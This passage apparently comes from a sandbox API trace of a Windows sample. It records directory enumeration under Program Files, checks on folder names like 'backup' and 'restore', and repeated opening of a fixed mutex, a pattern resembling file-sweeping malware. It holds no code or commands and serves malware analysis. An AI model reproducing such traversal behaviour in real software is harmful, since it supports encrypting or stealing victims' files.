dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18㥼X\x18\x88")) returned 0xffffffff [0104.127] GetLastError () returned 0x2 [0104.127] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="backup㟀X\x10") returned 6 [0104.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0104.128] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Reserv", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@坴X企@\x18㟄X\x18\x8f")) returned 0xffffffff [0104.128] GetLastError () returned 0x2 [0104.128] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.128] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="reserv㥸X\x10") returned 6 [0104.128] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0104.128] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Restore", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18㥼X\x18\x97")) returned 0xffffffff [0104.129] GetLastError () returned 0x2 [0104.129] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.129] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.129] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.129] SHGetMalloc (in: ppMalloc=0x18edd8 | out: ppMalloc=0x18edd8*=0x767666bc) returned 0x0 [0104.129] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edd4 | out: ppidl=0x18edd4) returned 0x0 [0104.129] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.131] SysReAllocStringLen (in: pbstr=0x18ee5c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee5c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.131] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.131] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.131] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.131] GlobalLock (hMem=0x450004) returned 0x588000 [0104.131] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.131] GlobalUnlock (hMem=0x450004) returned 0 [0104.131] GlobalLock (hMem=0x450004) returned 0x588000 [0104.131] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.131] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.131] GlobalUnlock (hMem=0x450004) returned 0 [0104.131] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.131] GlobalUnlock (hMem=0x45000c) returned 0 [0104.131] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*.*", lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575f28 [0104.132] FindNextFileW (in: hFindFile=0x575f28, lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.132] FindNextFileW (in: hFindFile=0x575f28, lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0104.132] GetLastError () returned 0x12 [0104.132] FindClose (in: hFindFile=0x575f28 | out: hFindFile=0x575f28) returned 1 [0104.132] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.132] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.132] GlobalUnlock (hMem=0x45000c) returned 0 [0104.132] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.132] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.132] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.132] GlobalUnlock (hMem=0x45000c) returned 0 [0104.132] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.132] GlobalUnlock (hMem=0x450004) returned 0 [0104.132] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*.*", lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575f28 [0104.132] FileTimeToLocalFileTime (in: lpFileTime=0x18eec4, lpLocalFileTime=0x18edd4 | out: lpLocalFileTime=0x18edd4) returned 1 [0104.133] FileTimeToDosDateTime (in: lpFileTime=0x18edd4, lpFatDate=0x18ee92, lpFatTime=0x18ee90 | out: lpFatDate=0x18ee92, lpFatTime=0x18ee90) returned 1 [0104.133] GlobalLock (hMem=0x450004) returned 0x588000 [0104.133] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.133] GlobalUnlock (hMem=0x450004) returned 0 [0104.133] GlobalLock (hMem=0x450004) returned 0x588000 [0104.133] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.133] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.133] GlobalUnlock (hMem=0x450004) returned 0 [0104.133] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.133] GlobalUnlock (hMem=0x45000c) returned 0 [0104.133] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.133] FindNextFileW (in: hFindFile=0x575f28, lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.133] FileTimeToLocalFileTime (in: lpFileTime=0x18eec4, lpLocalFileTime=0x18edd0 | out: lpLocalFileTime=0x18edd0) returned 1 [0104.133] FileTimeToDosDateTime (in: lpFileTime=0x18edd0, lpFatDate=0x18ee92, lpFatTime=0x18ee90 | out: lpFatDate=0x18ee92, lpFatTime=0x18ee90) returned 1 [0104.133] GlobalLock (hMem=0x45000c) returned 0x589008 [0104.133] GlobalHandle (pMem=0x589008) returned 0x45000c [0104.133] GlobalUnlock (hMem=0x45000c) returned 0 [0104.133] GlobalLock (hMem=0x45000c) returned 0x589008 [0104.134] GlobalLock (hMem=0x450004) returned 0x58b018 [0104.134] GlobalHandle (pMem=0x589008) returned 0x45000c [0104.134] GlobalUnlock (hMem=0x45000c) returned 0 [0104.134] GlobalHandle (pMem=0x58b018) returned 0x450004 [0104.134] GlobalUnlock (hMem=0x450004) returned 0 [0104.134] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.134] FindNextFileW (in: hFindFile=0x575f28, lpFindFileData=0x18eeb0 | out: lpFindFileData=0x18eeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0104.134] GetLastError () returned 0x12 [0104.134] FindClose (in: hFindFile=0x575f28 | out: hFindFile=0x575f28) returned 1 [0104.134] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x8b840, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceca35.dll", cAlternateFileName="SQLCEC~1.DLL")) returned 1 [0104.134] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.134] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.135] GlobalLock (hMem=0x450004) returned 0x588000 [0104.135] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.135] GlobalUnlock (hMem=0x450004) returned 0 [0104.135] GlobalLock (hMem=0x450004) returned 0x588000 [0104.135] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.135] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.135] GlobalUnlock (hMem=0x450004) returned 0 [0104.135] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.135] GlobalUnlock (hMem=0x45000c) returned 0 [0104.135] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.135] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcecompact35.dll", cAlternateFileName="SQLCEC~2.DLL")) returned 1 [0104.135] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.135] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.137] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.137] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.137] GlobalUnlock (hMem=0x45000c) returned 0 [0104.137] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.137] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.137] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.137] GlobalUnlock (hMem=0x45000c) returned 0 [0104.137] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.137] GlobalUnlock (hMem=0x450004) returned 0 [0104.138] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.138] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x24440, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceer35EN.dll", cAlternateFileName="SQLCEE~1.DLL")) returned 1 [0104.138] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.138] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.138] GlobalLock (hMem=0x450004) returned 0x588000 [0104.138] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.138] GlobalUnlock (hMem=0x450004) returned 0 [0104.138] GlobalLock (hMem=0x450004) returned 0x588000 [0104.138] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.138] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.138] GlobalUnlock (hMem=0x450004) returned 0 [0104.138] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.138] GlobalUnlock (hMem=0x45000c) returned 0 [0104.138] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.138] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab958d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x15a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceme35.dll", cAlternateFileName="SQLCEM~1.DLL")) returned 1 [0104.138] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.138] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.138] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.138] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.139] GlobalUnlock (hMem=0x45000c) returned 0 [0104.139] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.139] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.139] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.139] GlobalUnlock (hMem=0x45000c) returned 0 [0104.139] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.139] GlobalUnlock (hMem=0x450004) returned 0 [0104.139] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.139] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x3fa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceoledb35.dll", cAlternateFileName="SQLCEO~1.DLL")) returned 1 [0104.139] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.139] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.139] GlobalLock (hMem=0x450004) returned 0x588000 [0104.139] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.139] GlobalUnlock (hMem=0x450004) returned 0 [0104.139] GlobalLock (hMem=0x450004) returned 0x588000 [0104.139] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.139] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.139] GlobalUnlock (hMem=0x450004) returned 0 [0104.139] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.139] GlobalUnlock (hMem=0x45000c) returned 0 [0104.140] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.140] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x114e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceqp35.dll", cAlternateFileName="SQLCEQ~1.DLL")) returned 1 [0104.140] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.140] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.140] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.140] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.140] GlobalUnlock (hMem=0x45000c) returned 0 [0104.140] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.140] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.140] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.140] GlobalUnlock (hMem=0x45000c) returned 0 [0104.140] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.140] GlobalUnlock (hMem=0x450004) returned 0 [0104.140] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.140] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 1 [0104.140] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.140] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.140] GlobalLock (hMem=0x450004) returned 0x588000 [0104.141] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.141] GlobalUnlock (hMem=0x450004) returned 0 [0104.141] GlobalLock (hMem=0x450004) returned 0x588000 [0104.141] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.141] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.141] GlobalUnlock (hMem=0x450004) returned 0 [0104.141] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.141] GlobalUnlock (hMem=0x45000c) returned 0 [0104.141] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.141] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 0 [0104.141] GetLastError () returned 0x12 [0104.141] FindClose (in: hFindFile=0x575030 | out: hFindFile=0x575030) returned 1 [0104.142] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0104.142] GetLastError () returned 0x12 [0104.142] FindClose (in: hFindFile=0x56ed00 | out: hFindFile=0x56ed00) returned 1 [0104.142] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.142] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\矋\x18￾￿F") returned 37 [0104.142] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\F") returned 6 [0104.143] FindFirstFileW (in: lpFileName="C:\\Program Files\\Adobe", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㎌W企@\x18㤄X頻\x18q")) returned 0xffffffff [0104.143] GetLastError () returned 0x2 [0104.143] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.143] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="adobe\\絠X`") returned 6 [0104.143] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\") returned 7 [0104.144] FindFirstFileW (in: lpFileName="C:\\Program Files\\Oracle", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㮴V企@\x18㥼X頻\x18y")) returned 0xffffffff [0104.144] GetLastError () returned 0x2 [0104.144] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0104.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Archive") returned 7 [0104.144] FindFirstFileW (in: lpFileName="C:\\Program Files\\Archive", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", 